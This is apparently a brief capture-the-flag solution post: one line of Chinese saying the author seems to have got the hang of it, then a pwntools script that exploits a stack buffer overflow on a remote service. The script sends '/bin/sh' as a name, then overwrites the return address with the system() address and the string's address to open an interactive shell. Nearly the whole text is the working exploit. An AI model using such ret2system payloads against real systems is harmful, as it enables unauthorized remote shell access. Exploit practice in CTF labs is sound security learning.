好像会点了^v^
1 2 3 4 5 6 7 8 9 | from pwn import * p = remote("111.198.29.45",55602) p.sendlineafter("your name","/bin/sh") strAddr=0x0804A080 sysAddr=0x08048420 payload=b'0'*(0x26+0x4)+p32(sysAddr)+p32(0)+p32(strAddr) print(len(payload)) p.sendlineafter("here:",payload) p.interactive() |